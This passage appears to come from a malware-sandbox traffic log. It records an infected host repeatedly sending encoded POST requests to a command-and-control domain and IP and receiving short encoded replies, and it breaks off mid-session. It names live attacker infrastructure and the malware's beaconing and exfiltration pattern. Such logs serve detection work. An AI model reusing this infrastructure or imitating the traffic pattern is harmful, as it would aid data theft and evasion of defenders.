                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            116 | 192.168.2.6 | 49864 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:29.917018890 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:30.274939060 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:30.593986988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:30.722673893 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            117 | 192.168.2.6 | 49865 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:30.860719919 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:31.212620020 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:31.526457071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:31.653557062 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            118 | 192.168.2.6 | 49866 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:31.778268099 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:32.134522915 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:32.426858902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:32.554069996 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            119 | 192.168.2.6 | 49867 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:32.689176083 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:33.040501118 CEST | 1024 | OUT | request body
                                                            Sep 2, 2024 13:35:33.342063904 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:33.469996929 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            120 | 192.168.2.6 | 49868 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:33.588916063 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:33.964642048 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:34.234487057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:34.357059956 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:34.434254885 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:34.635210991 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:34.638443947 CEST | 1340 | OUT | request body
                                                            Sep 2, 2024 13:35:35.258191109 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            121 | 192.168.2.6 | 49869 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:34.532282114 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:34.884443998 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:35.183403969 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:35.394862890 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            122 | 192.168.2.6 | 49870 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:35.528321028 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:35.884314060 CEST | 1028 | OUT | request body
                                                            Sep 2, 2024 13:35:36.177639961 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:36.396120071 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            123 | 192.168.2.6 | 49871 | 80.211.144.156 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:35:36.528453112 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:36.884514093 CEST1028OUTData Raw: 50 55 5a 56 5e 47 5c 53 5b 5f 56 5a 57 55 50 5c 55 5e 5e 43 50 5b 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZV^G\S[_VZWUP\U^^CP[ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!9^?8#]$1!'=&\(7-'8Y'?6(;#>B<[=.*%^./]+
                                                            Sep 2, 2024 13:35:37.192662001 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:37.320971012 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            124           192.168.2.6    49872          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:37.451905012 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:37.806154966 CEST1028OUTData Raw: 55 5e 5a 53 5e 44 59 5d 5b 5f 56 5a 57 5b 50 59 55 58 5e 45 50 5f 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZS^DY][_VZW[PYUX^EP_ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'0!<?]3*3\+=4]/?3<(;0Q)4 ^=.*%^./]+0
                                                            Sep 2, 2024 13:35:38.094038963 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:38.298681974 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            125           192.168.2.6    49873          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:38.420145035 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:38.778358936 CEST1028OUTData Raw: 55 55 5f 52 5e 49 59 50 5b 5f 56 5a 57 5f 50 5e 55 5f 5e 45 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UU_R^IYP[_VZW_P^U_^EPSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!<4$T*'=6\(;;'&?8/>$().%^./]+
                                                            Sep 2, 2024 13:35:39.063173056 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:39.189219952 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            126           192.168.2.6    49874          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:39.309196949 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:39.674917936 CEST1028OUTData Raw: 55 51 5a 56 5e 46 59 5d 5b 5f 56 5a 57 54 50 5a 55 51 5e 48 50 58 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQZV^FY][_VZWTPZUQ^HPXZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&"=X((36$%<[784<]0!+3>'>&Y-%^./]+
                                                            Sep 2, 2024 13:35:39.982764006 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:40.114883900 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            127           192.168.2.6    49875          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:40.262665987 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:40.618944883 CEST1028OUTData Raw: 50 52 5a 51 5e 49 5c 50 5b 5f 56 5a 57 54 50 5b 55 51 5e 45 50 5f 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZQ^I\P[_VZWTP[UQ^EP_ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'1X(;('=Z%=*\>-8-7''?9W<^0)$?>&.:%^./]+
                                                            Sep 2, 2024 13:35:40.920399904 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.049166918 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            128           192.168.2.6    49876          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:40.269515991 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1324
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:40.618822098 CEST1324OUTData Raw: 55 5f 5a 50 5e 43 59 53 5b 5f 56 5a 57 5d 50 5d 55 5e 5e 44 50 53 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZP^CYS[_VZW]P]U^^DPSZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_3!<;$0%Z'-:(=4Z8$3'<%T?80W=$<=^:*%^./]+
                                                            Sep 2, 2024 13:35:40.920420885 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.053333044 CEST    308                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 34 1d 27 55 32 02 33 00 3e 39 07 06 2b 3d 3b 1b 2e 2c 3f 04 24 00 3f 10 28 1c 0b 18 25 29 03 59 3e 3c 0f 58 28 1c 39 1e 35 1e 20 5b 03 1f 26 06 23 54 32 13 26 06 31 58 24 37 22 5c 21 19 23 07 29 2e 29 09 27 2d 24 58 20 08 32 12 3b 13 0c 14 25 38 2c 5f 2d 12 29 05 25 2e 2a 56 08 16 38 1d 2b 02 35 06 34 19 06 01 21 28 2d 1f 20 18 33 51 24 1d 09 55 33 39 2d 55 24 3e 24 0c 3d 2e 3c 01 33 07 00 06 20 0d 3d 55 3a 03 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: 4'U23>9+=;.,?$?(%)Y><X(95 [&#T2&1X$7"\!#).)'-$X 2;%8,_-)%.*V8+54!(- 3Q$U39-U$>$=.<3 =U:$P.-V0WS


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            129           192.168.2.6    49877          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:41.170368910 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:41.524825096 CEST1028OUTData Raw: 55 50 5f 56 5e 40 5c 54 5b 5f 56 5a 57 5f 50 59 55 51 5e 47 50 52 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_V^@\T[_VZW_PYUQ^GPRZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'9X+;;'T!$5+= /4 0<9?<=([*")::%^./]+
                                                            Sep 2, 2024 13:35:41.844887018 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.966924906 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            130           192.168.2.6    49878          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:42.109360933 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:42.464344978 CEST1028OUTData Raw: 50 52 5f 56 5b 44 59 56 5b 5f 56 5a 57 5a 50 5d 55 5a 5e 48 50 5c 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PR_V[DYV[_VZWZP]UZ^HP\ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!>?'%"=[0."^+<,('Z5R+T=8[)1Y.:%^./]+
                                                            Sep 2, 2024 13:35:42.766242027 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:42.890738010 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            131           192.168.2.6    49879          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:43.031779051 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:43.384490967 CEST1028OUTData Raw: 55 5e 5f 56 5e 40 5c 57 5b 5f 56 5a 57 5f 50 5a 55 50 5e 47 50 5b 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_V^@\W[_VZW_PZUP^GP[ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_3"<?$">32+(/?'%T</)$=.:%^./]+
                                                            Sep 2, 2024 13:35:43.693470955 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:43.821547985 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            132           192.168.2.6    49880          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:43.981528997 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:44.338293076 CEST1028OUTData Raw: 50 53 5a 51 5e 47 5c 50 5b 5f 56 5a 57 5c 50 5b 55 50 5e 45 50 5f 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
